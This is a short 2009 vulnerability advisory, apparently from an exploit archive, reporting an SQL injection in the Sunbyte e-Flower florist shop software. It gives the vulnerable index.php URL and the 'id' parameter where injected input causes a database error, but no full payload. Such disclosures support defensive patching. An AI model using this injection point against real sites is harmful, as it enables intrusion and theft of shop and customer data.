[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Sunbyte e-Flower SQL Injection Vulneralbility
# Published : 2009-12-28
# Author : Don Tukulesto
# Previous Title : Joomla Component com_calendario Blind SQL injection Vulnerability
# Next Title : Nuke Remote SQL Injection Vulnerability


/**************************************************************************

[!] Sunbyte e-Flower SQL Injection Vulneralbility
[!] Author      : Don Tukulesto (root@indonesiancoder.com)
[!] Homepage    : http://www.indonesiancoder.com
[!] Date        : December 28, 2009
[!] Tune In     : http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Vendor : http://www.sunbyte.net/
[+] Download : http://store.esellerate.net/s.aspx?s=STR932252155
[+] Version() : -
[+] Price : $150
[+] Overview : Sunbyte eFlower is an e-commerce system that helps your florist shop takes order through Internet.
[+] Method : SQL Injection
[+] Dork : Nothing else Matter

===========================================================================

[ Got Error ]

http://server/eFlower/index.php?s=cat&m=o&id=[IndonesianCoder-2009]

===========================================================================